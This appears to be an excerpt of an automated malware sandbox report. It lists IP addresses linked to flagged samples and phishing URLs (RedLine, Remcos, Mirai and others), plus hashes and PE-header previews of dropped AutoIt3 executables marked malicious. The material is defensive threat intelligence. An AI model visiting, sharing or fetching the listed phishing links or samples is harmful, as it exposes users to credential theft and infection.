                                                                                                                                                                                                                                                                                                                                                                                        https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 18.245.31.89
                                                                                                                                                                                                                                                                                                                                                                                        https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                        rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 52.60.87.163
                                                                                                                                                                                                                                                                                                                                                                                        https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                        https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                        Salary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 13.33.187.96
                                                                                                                                                                                                                                                                                                                                                                                        W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 108.156.211.71
                                                                                                                                                                                                                                                                                                                                                                                        .i.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                                                                                                                                                                                        https://ascot.auditboardapp.com/task-redirect/4113?source=email&CTA=taskTitleLink&notificationId=044e55a3-481a-4a33-91c7-abbaf803b1d7&projectId=367&taskId=4113&notificationType=WS-task-submittedGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 75.2.90.152
                                                                                                                                                                                                                                                                                                                                                                                        AMAZON-AESUShttps://web-login.malwarebouncer.com/XTUJCUERyUUI1U0FNNzZXQUJ5MHZQSmdBM1hZSE5mcVI4VzQ0aS9zTXBrOTY4enJacHgzQ2x0Mlp5cnkzRUlDSlBNV1BkTnNEaWdmSXJJTW1LZlFSWmhoNy83YnI5Y3pVVjR4ZmVXd3pKVkczLzBqTllIelpxaHo1MEJiZUc1cFJiZTM2akJiQlN2U1pBSDRUUld2ZVhJRmpPemZadmJNTFNiNi9rYmcrQ0tIUi9Kc0VzMmc0bWJ2bTV6U3N1bFQvbUREN2ZuYUZLY29ITjZDdEtnTEQtLSswcXR3ODBibTF1cUxEQ3ktLXprOHNld0xDdERQRHRVQXBmRG5pakE9PQ==?cid=2255119917Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 52.72.176.27
                                                                                                                                                                                                                                                                                                                                                                                        https://web-login.malwarebouncer.com/XTUJCUERyUUI1U0FNNzZXQUJ5MHZQSmdBM1hZSE5mcVI4VzQ0aS9zTXBrOTY4enJacHgzQ2x0Mlp5cnkzRUlDSlBNV1BkTnNEaWdmSXJJTW1LZlFSWmhoNy83YnI5Y3pVVjR4ZmVXd3pKVkczLzBqTllIelpxaHo1MEJiZUc1cFJiZTM2akJiQlN2U1pBSDRUUld2ZVhJRmpPemZadmJNTFNiNi9rYmcrQ0tIUi9Kc0VzMmc0bWJ2bTV6U3N1bFQvbUREN2ZuYUZLY29ITjZDdEtnTEQtLSswcXR3ODBibTF1cUxEQ3ktLXprOHNld0xDdERQRHRVQXBmRG5pakE9PQ==?cid=2255119917Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 52.72.176.27
                                                                                                                                                                                                                                                                                                                                                                                        https://ascot.auditboardapp.com/task-redirect/4113?source=email&CTA=taskTitleLink&notificationId=044e55a3-481a-4a33-91c7-abbaf803b1d7&projectId=367&taskId=4113&notificationType=WS-task-submittedGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 44.196.125.45
                                                                                                                                                                                                                                                                                                                                                                                        https://shared.outlook.inky.com/link?domain=ctrk.klclick.com&t=h.eJx1zT1vwjAUheG_gjyX2E4ItpkoQgJlqGgUqWNlGzu1cvMh-2ZAFf8dJUO37s857y-ZI5DDhvwgTulAqcXYZR1YCLbL7NhToIxX76K5FNdzw9mtvtQf1dfts2rq0zcjbxvSLfs2mKgBddyaOYXBpbS1egqogcbRRXRw_CPGrs--9LkSd--5LbksuVHGi72WO6WkZCKnXORqLwvBimxXLiW3ljAAuMexnbDXg25d7wZMI8wYxiEtzwu9r_R_8nwBLatRZw.MEYCIQCSahzZW_4sDNrHIm-tqOS-MfCLNun8fj_Bxq7Zj7FBvQIhAKVsQPfH8EnP8IAulYo78COUXm3bMhbNANS-wTC8S6QO#bW1vc2VyQHNreWxpbmUtaG9sdC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 52.7.146.246
                                                                                                                                                                                                                                                                                                                                                                                        Sars Urgent Notice.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 23.22.254.206
                                                                                                                                                                                                                                                                                                                                                                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 54.12.106.229
                                                                                                                                                                                                                                                                                                                                                                                        la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 3.84.59.106
                                                                                                                                                                                                                                                                                                                                                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 34.229.147.111
                                                                                                                                                                                                                                                                                                                                                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 3.220.132.122
                                                                                                                                                                                                                                                                                                                                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 54.210.169.183
                                                                                                                                                                                                                                                                                                                                                                                        CSCUSarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 128.114.186.151
                                                                                                                                                                                                                                                                                                                                                                                        RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                        TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                        AMAZON-02USfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 18.244.18.38
                                                                                                                                                                                                                                                                                                                                                                                        https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 18.245.31.89
                                                                                                                                                                                                                                                                                                                                                                                        https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                        rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 52.60.87.163
                                                                                                                                                                                                                                                                                                                                                                                        https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                        https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 45.112.123.225
                                                                                                                                                                                                                                                                                                                                                                                        Salary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 13.33.187.96
                                                                                                                                                                                                                                                                                                                                                                                        W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 108.156.211.71
                                                                                                                                                                                                                                                                                                                                                                                        .i.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                                                                                                                                                                                                        https://ascot.auditboardapp.com/task-redirect/4113?source=email&CTA=taskTitleLink&notificationId=044e55a3-481a-4a33-91c7-abbaf803b1d7&projectId=367&taskId=4113&notificationType=WS-task-submittedGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                        • 75.2.90.152

                                                                                                                                                                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1508864
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879297230326205
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:mzCAR0iT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qCAXLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:28353A6B0AB496234BF0F4B9A9E0814F
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A1C57603519B2A3B2D18C17641FBD9EFA595180C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FD790B2C8384DB31033B995215875E166B0C3A874AB4442A13188BAD182CD9CE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:11907AA30A631516A7CC04F303C6FD8D3E6144B81F7ECA50B2B8FB007C1D9F65973C788E81734209DBD257F51E2E3A01816407F7317DF818A8E85FA1FDD8A3D7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@.........................................................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....`...p.......f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1450496
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.821213274865714
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:7CbKgi/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:VLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E7E8770AB25137BA60387FABC57557E9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F2C172E5AE4E33CB1ABC56ACF62F27E25250D1FD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6A4ECFEFA9A23506215B012236F02D5AE0BB889D0D06D898584255E2F1D44EC3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:78BD2E7B2B5408387D040C63392B71C76B00D9F1AFC3B5D76B3307ACEB9EA1047E9222A206E83910BEFB27FDED73C0964624D1CBDB85E9F113CA80D72A0FEC1F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@...........................-.....U.......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...p...`.......r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1469952
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.819272348584798
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:iKdHH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:HdnLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3A6DDA66DF4F0B8EFDE1F9FD05060A85
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:201E3AD17FAE22D210E9A2CE09DA4F069F533E14
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8D32E3936A82C52343223C9763D60348B1AB2375EFDBCB59753CC84A16A3A12C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:399CB8A64FB6EA17E76836FC017F69413A2F63DF2A6883C13E7C820419D860C1E289DB5FEBA90742329A5B3CB6EC13C9F74804D38BA0BC711701807C2E4B372A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@.............................0............ .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...`..........................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.644261032123154
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:fK0eqkSR7Xgo4TiRPnLWvJvLNiXicJFFRGNzj3:fK0pR7Xn4TiRCvJv7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4A6F8A58A7A47A4395EF50D4D0B36B43
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5811033A3F2EFC8E480A8F66628DFB2A57E357EF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4F11E9AE2B45BE3F3A4C1FF367294BF25F43B6F0A08BC6F96F196998B8215003
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2371274A14D4CFCD522B515C90F461DEFA76A0D6E037814A19D9D5DF7D12E2A6C2F94FCE6B57BD2182FDEE501D97879F741530C53E95A6E01C7E9AD662BE6611
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....o.!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.562602494066898
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:HfYP1JsEDkSR7Xgo4TiRPnLWvJvLNiXicJFFRGNzj3:/YPBR7Xn4TiRCvJv7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DE7E2387C18CF7F18BBDCBEA278F8AF6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A7A0156C73D04A7DB9426CB116721807638E467B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B39CD99D20AAF3FC0A006F5AF1E04952CC745AF9AB1D54ABC9BC16B92B507034
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:507E5DBB6534E6B1E8924DF67B1EF7866F6ED42C7E650EE6C9B95BA952812ED269BFDC35B71B4833E0DA42E541313065C27545F055E76992B9EEA7287889216E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....}.$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1400832
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6565414089356825
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:FYUcknN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FZcknNLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B656E72B0ECF0C18DE56CEF0CB6D12A5
